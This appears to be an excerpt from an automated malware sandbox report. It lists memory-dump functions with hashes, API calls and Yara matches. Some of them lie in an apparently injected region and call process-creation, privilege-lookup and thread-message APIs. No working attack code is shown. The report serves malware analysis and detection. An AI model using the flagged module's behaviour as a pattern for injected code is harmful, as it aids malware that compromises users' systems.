                                  • Opcode Fuzzy Hash: 5862b3a7633ca896a9cc08a9519094e28488e5531256640c13e0c6fc7bda3f99
                                  • Instruction Fuzzy Hash: FE9002B120100943F14161594404B860106D7E0345F61C026A0525654DC655E85175A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9ec72b03f9d442a1aab08618439899e6b878197b995f2b7a21f06cd0e0f48bb
                                  • Instruction ID: 710803ad57dccac5d4252819a6897b506caec5c2edad03e151f01dc375df69ba
                                  • Opcode Fuzzy Hash: c9ec72b03f9d442a1aab08618439899e6b878197b995f2b7a21f06cd0e0f48bb
                                  • Instruction Fuzzy Hash: 159002B120108903F1516159840478A0106D7D0345F65C421A4825658DC6D5E89171A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3199ae874ce6da25bcc938346b81fdfab2baf8eb07dd908548d01c6d5e0cb205
                                  • Instruction ID: f5883fb8dd1977e673d7159fdeacdec6bd991e56ad2070da2939220ff3bdd337
                                  • Opcode Fuzzy Hash: 3199ae874ce6da25bcc938346b81fdfab2baf8eb07dd908548d01c6d5e0cb205
                                  • Instruction Fuzzy Hash: 0C9002B120504943F18171594404A860116D7D0349F61C021A0465694DD665ED55B6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c6f101b9f650bfc9e5c47f31604093996c8393cab5a702ed5ee5bc9c6e20ccca
                                  • Instruction ID: 78dfe35c816269238fa566f75fe5d72f3421f3b50cc351c8574032620acbdd0b
                                  • Opcode Fuzzy Hash: c6f101b9f650bfc9e5c47f31604093996c8393cab5a702ed5ee5bc9c6e20ccca
                                  • Instruction Fuzzy Hash: C09002B120100903F1C17159440468A0106D7D1345FA1C025A0426654DCA55EA5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7707c24e8a5c61156567425cb5083fd1d5d6bb518fb5504fbffe43b85df07ccb
                                  • Instruction ID: e7d5771d3dc58d8afa72e72caecddc90755d1affec20fbef3e78c59a1e24e845
                                  • Opcode Fuzzy Hash: 7707c24e8a5c61156567425cb5083fd1d5d6bb518fb5504fbffe43b85df07ccb
                                  • Instruction Fuzzy Hash: 4E9002B131114503F151615984047460106D7D1245F61C421A0C25558DC6D5E89171A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 437098881432b1a6c28aaf9cd350999a980adee736f9d92da66ff56b60e0b0a9
                                  • Instruction ID: ceec62602441242fed9ebb60c03cc687ad7c2f3604ae801e4521d45b7b0821a6
                                  • Opcode Fuzzy Hash: 437098881432b1a6c28aaf9cd350999a980adee736f9d92da66ff56b60e0b0a9
                                  • Instruction Fuzzy Hash: DB9002A921300103F1C17159540864A0106D7D1246FA1D425A0416558CC955E86963A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ecb2372af7eca3466e7a410ee0083347bf2fbaca24ca45bd0fbe37f7ea06200e
                                  • Instruction ID: b18cbc87afb116b63b7c1fd09b8e0fca2bc528602f8ab0c55468abee79dc0015
                                  • Opcode Fuzzy Hash: ecb2372af7eca3466e7a410ee0083347bf2fbaca24ca45bd0fbe37f7ea06200e
                                  • Instruction Fuzzy Hash: CF9002B120100503F141659954086860106D7E0345F61D021A5425555EC6A5E89171B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 42006322e8384170154ef2b069edf84d143b27302fe3ba9d669d7cdb0bbb27cb
                                  • Instruction ID: 9ff61ee32a0e9662f0d4cb85eb3bbf9c3161983a351fe18c5692fca766182492
                                  • Opcode Fuzzy Hash: 42006322e8384170154ef2b069edf84d143b27302fe3ba9d669d7cdb0bbb27cb
                                  • Instruction Fuzzy Hash: 3B9002A1242042537586B15944045474107E7E0285BA1C022A1815950CC566F856E6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e8bf45e8bed68bae66f28b29bdc9342c1923c0fb1f336e6f79317d161dee3883
                                  • Instruction ID: ac93b875802161a145ad8ac30e2b869f7a879f43dfe3bcb7891d5529b42466f5
                                  • Opcode Fuzzy Hash: e8bf45e8bed68bae66f28b29bdc9342c1923c0fb1f336e6f79317d161dee3883
                                  • Instruction Fuzzy Hash: 669002B120100513F15261594504747010AD7D0285FA1C422A0825558DD696E952B1A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0363f99c8c68892554ad61f33b60fb33b91c3ae3db1c1d2f4ee4e30f3ff69526
                                  • Instruction ID: ce5c4741f8050338c4a1529b6947a37490cd086c04b479e7df2f1a0e23d0d93e
                                  • Opcode Fuzzy Hash: 0363f99c8c68892554ad61f33b60fb33b91c3ae3db1c1d2f4ee4e30f3ff69526
                                  • Instruction Fuzzy Hash: 849002E134100543F14161594414B460106D7E1345F61C025E1465554DC659EC5271A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1164f27e810ea36b47ed006e9a2ab0222ab41c82f818ff575fd4d553da12c750
                                  • Instruction ID: ca94eee55168fc7d5bdd2cda77570fbf226ba90528d4f8f711a704a2db83db12
                                  • Opcode Fuzzy Hash: 1164f27e810ea36b47ed006e9a2ab0222ab41c82f818ff575fd4d553da12c750
                                  • Instruction Fuzzy Hash: A09002F120100503F181715944047860106D7D0345F61C021A5465554EC699EDD576E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 037014b67b353a8c2e012363d08ab5fd7b70ff64edd9900382b49e6b8265a557
                                  • Instruction ID: c5bfa7e406be5cefe288d6efc75c1d720f7f64d1581952ab524ccce671b4b950
                                  • Opcode Fuzzy Hash: 037014b67b353a8c2e012363d08ab5fd7b70ff64edd9900382b49e6b8265a557
                                  • Instruction Fuzzy Hash: A29002A121180143F24165694C14B470106D7D0347F61C125A0555554CC955E86165A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03038286, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 3333
                                  • API String ID: 1836367815-2924271548
                                  • Opcode ID: 82a5ee899fb930b10c1c4bb489411ec9d2010d91c806830f37cbb8d6c4bc0a7d
                                  • Instruction ID: 9df7671a2a7d34c0bdda152f71b0f2c3705167e71d0edb3307cffb494ebbbf66
                                  • Opcode Fuzzy Hash: 82a5ee899fb930b10c1c4bb489411ec9d2010d91c806830f37cbb8d6c4bc0a7d
                                  • Instruction Fuzzy Hash: 68014C357477193BEB24E5685C42FBD738C5F83A30F0C81A9FA48EE2C0DA5494050296
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03033AF8), ref: 0304A08D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: e28ebc6f7c795f0fe5de6eb8cf75b3fc85175b6db14034f41f302552e9976211
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 2BE012B6200208BBDB18EF99CC49EA777ACAF88650F018558BA185B241C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030382E8, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 6d24fa169afa7d971b2b1bed84f5191ef6c2a68e3a598c756c39e784be85e7d3
                                  • Instruction ID: c5fc027ae673389358ed671ee7beb7cba6a0a8dec35b1f4fbe6ae016a71967e6
                                  • Opcode Fuzzy Hash: 6d24fa169afa7d971b2b1bed84f5191ef6c2a68e3a598c756c39e784be85e7d3
                                  • Instruction Fuzzy Hash: 8701F971A823247BEB21E6988C42FFE7B6CAB41B50F084158FF04BE1C1E694650647E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030382F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                  • Instruction ID: fd1c502b6ae9d5ea6bd00c91bfea7f96d3301c83fa286fe4db511261d7f91720
                                  • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                  • Instruction Fuzzy Hash: EC01DB75A823287BE720E6989C42FFF776C6B81B51F044158FF08BE1C1E6946A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A0CD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A124
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 1a6500c2d7c005fb88a90302c2cf9c1b6a0b4b6aa6edbe83f1df620e056b6ddc
                                  • Instruction ID: 34cdd626b8e412b8490252787a7ece5d7dc051187905f7657888cd8c99ed26f6
                                  • Opcode Fuzzy Hash: 1a6500c2d7c005fb88a90302c2cf9c1b6a0b4b6aa6edbe83f1df620e056b6ddc
                                  • Instruction Fuzzy Hash: A5019DB6211108BFCB58DF99DC91EEB37A9AF8C754F158258BA1D97241C630E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A124
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 38ba6727aa2444cefa8c6f52a52e80e8562860bda0041b7b9a7d2937b607c503
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 0C01AFB2210208BFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A165, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F192,0303F192,?,00000000,?,?), ref: 0304A1F0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 11af01476cbed36e5c792d61717c2f149acef67199075897d40bb66426870dc8
                                  • Instruction ID: a578e30ebf9631fd417a1ebe7f2e9ab552257d59446a4de99b3a3c5e64435900
                                  • Opcode Fuzzy Hash: 11af01476cbed36e5c792d61717c2f149acef67199075897d40bb66426870dc8
                                  • Instruction Fuzzy Hash: 3BE022B13882807FDB11CF689C10EE73FA8DF86210F048999ECC94B212C030E916C7B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F192,0303F192,?,00000000,?,?), ref: 0304A1F0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 13e4509275f424ee8a2a8ddc344b9e0aaae001436776838a2eec0c1601ba6249
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: 11E01AB56002087BDB10DF49CC85EE737ADAF88650F018164BA0C5B241C930E9108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0304A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(030444F6,?,03044C6F,03044C6F,?,030444F6,?,?,?,?,?,00000000,00000000,?), ref: 0304A04D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: 408b5e64ca5beef20f474750d931ebf9b82e6b9310d64687e1c98392a0275105
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: 85E012B6200208BBDB14EF99CC41EA777ACAF88650F118558BA185B241C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0303F687, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6BB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 13ad9fd541bd1014bddf6d437e9ff5c320bbe308f084453bf388b9d9edb01f13
                                  • Instruction ID: 302bf4ff25dc5925045f1edaaecec53395dec406e0fab0c3f4332d517c9fb4e7
                                  • Opcode Fuzzy Hash: 13ad9fd541bd1014bddf6d437e9ff5c320bbe308f084453bf388b9d9edb01f13
                                  • Instruction Fuzzy Hash: 05E02B72B913003BF710EEB2DC43F9A33886F54610F0C4064F948DB2C3EA30D1018610
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0303F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6BB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                  • Instruction ID: ee39a51a85439c20a335027ae92f901a2da88af23d2fa0d475a7b213417993ac
                                  • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                  • Instruction Fuzzy Hash: 2AD0A7767903043BE610FAA69C03F6673CC5B45A00F490074F948DB3C3D960E5004165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a4d4b64583fa15904a33c32f88a550fc3fc08f3675a3708aa2624df9e2bbed69
                                  • Instruction ID: 84f3b0a60aa63e30f3dc1dbab4f9a0affe4bf575dab96bea7c20c5c83bd66ca0
                                  • Opcode Fuzzy Hash: a4d4b64583fa15904a33c32f88a550fc3fc08f3675a3708aa2624df9e2bbed69
                                  • Instruction Fuzzy Hash: E8B09BF19014D6C6F751D760460C7177A11BBD4745F26C461D1430641A4778E191F5F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 04CFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E04CFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04CACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04CF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04CF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x04cffdda
                                  0x04cffde2
                                  0x04cffde5
                                  0x04cffdec
                                  0x04cffdfa
                                  0x04cffdff
                                  0x04cffe0a
                                  0x04cffe0f
                                  0x04cffe17
                                  0x04cffe1e
                                  0x04cffe19
                                  0x04cffe19
                                  0x04cffe19
                                  0x04cffe20
                                  0x04cffe21
                                  0x04cffe22
                                  0x04cffe25
                                  0x04cffe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CFFE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CFFE2B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: e664bdf46ab89dc7a68c18abe825032894d0150293f3f6da0ef89b7d77beab3d
                                  • Instruction ID: 65a537d4ec3337fa2d4388cefe4f403822ac9d2657c3fa3136e06cc3812f7b26
                                  • Opcode Fuzzy Hash: e664bdf46ab89dc7a68c18abe825032894d0150293f3f6da0ef89b7d77beab3d
                                  • Instruction Fuzzy Hash: 34F0F632640601BFE6201A45DC02F27BF6BEB44730F140315F728561E1EA62F8709AF4
                                  Uniqueness

                                  Uniqueness Score: -1.00%